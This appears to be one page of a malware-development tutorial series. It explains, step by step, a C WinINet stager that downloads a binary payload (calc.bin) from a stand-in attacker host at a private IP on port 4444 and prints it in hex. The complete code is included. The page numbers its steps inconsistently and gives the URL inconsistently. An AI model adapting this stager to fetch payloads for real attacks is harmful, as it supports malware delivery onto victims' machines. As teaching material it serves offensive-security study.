Web Staging Payload

cCopyEditHINTERNET hInternet, hFile;
DWORD dwBytesRead;
BYTE buffer[1024];
DWORD dwFileSize = 0;

hInternet: A handle for the internet session.
hFile: A handle for the remote file (the file to be downloaded).
dwBytesRead: Stores the number of bytes read during each iteration.
buffer[1024]: A temporary buffer to store the downloaded data.
dwFileSize: Tracks the total file size.

1. Open an Internet Session

cCopyEdithInternet = InternetOpenA("HTTP Downloader", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
if (!hInternet) {
    printf("Failed to initialize WinINet.\n");
    return 1;
}

InternetOpenA(...): Initializes an internet session.
- "HTTP Downloader" → A user-agent string (can be any name).
- INTERNET_OPEN_TYPE_DIRECT → Direct internet connection (no proxy).
- The NULL parameters mean no proxy settings are used.
If the function fails, it prints an error message and exits.

3. Open the Remote File URL

cCopyEdithFile = InternetOpenUrlA(hInternet, "http://192.168.1.10:4444/calc.bin", NULL, 0, INTERNET_FLAG_RELOAD, 0);
if (!hFile) {
    printf("Failed to open URL.\n");
    InternetCloseHandle(hInternet);
    return 1;
}

InternetOpenUrlA(...): Opens a connection to the specified URL (http://192.168.1.217:4444/calc.bin).

4. Read the File in Chunks

cCopyEditprintf("File content in hex:\n");
while (InternetReadFile(hFile, buffer, sizeof(buffer), &dwBytesRead) && dwBytesRead > 0) {

InternetReadFile(...): Reads the file in chunks of 1024 bytes (size of buffer) Because The Payload Can Be A Large FIle .

6. Print Data in Hexadecimal Format

cCopyEdit    for (DWORD i = 0; i < dwBytesRead; i++) {
        if (i % 16 == 0)
            printf("\n\t"); 
        printf("%02X ", buffer[i]); 
    }
    dwFileSize += dwBytesRead;
}

Loops through each byte in the buffer:
- Every 16 bytes, a newline (\n) is added to format the output.
- Each byte is printed as a 2-character hexadecimal value (%02X).

7. Print the File Size

cCopyEditprintf("\n\nFile size: %lu bytes\n", dwFileSize);

Displays the total size of the downloaded file.

8. Cleanup and Exit

cCopyEditInternetCloseHandle(hFile);
InternetCloseHandle(hInternet);
return 0;

Closes the handles to free resources.

Summary What Does This Program Do?

Connects to the internet using InternetOpenA().
Downloads a binary file (calc.bin) from http://192.168.1.10:4444/.
Reads the file in chunks (1024 bytes at a time).
Prints the file contents in hexadecimal format.


#include <windows.h>
#include <wininet.h>
#include <stdio.h>

#pragma comment(lib, "wininet.lib")

int main() {
    HINTERNET hInternet, hFile;
    DWORD dwBytesRead;
    BYTE buffer[1024];
    DWORD dwFileSize = 0;

    hInternet = InternetOpenA("HTTP Downloader", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
    if (!hInternet) {
        printf("Failed to initialize WinINet.\n");
        return 1;
    }


    hFile = InternetOpenUrlA(hInternet, "http://192.168.1.10:4444/calc.bin", NULL, 0, INTERNET_FLAG_RELOAD, 0);
    if (!hFile) {
        printf("Failed to open URL.\n");
        InternetCloseHandle(hInternet);
        return 1;
    }

    printf("File content in hex:\n");
    while (InternetReadFile(hFile, buffer, sizeof(buffer), &dwBytesRead) && dwBytesRead > 0) {
        for (DWORD i = 0; i < dwBytesRead; i++) {
            if (i % 16 == 0)
                printf("\n\t"); 
            printf("%02X ", buffer[i]); 
        }
        dwFileSize += dwBytesRead;
    }



    printf("\n\nFile size: %lu bytes\n", dwFileSize);


    InternetCloseHandle(hFile);
    InternetCloseHandle(hInternet);

    return 0;
}

PreviousProcess Injection --Part 2--NextEncryption Files c

Last updated 11 months ago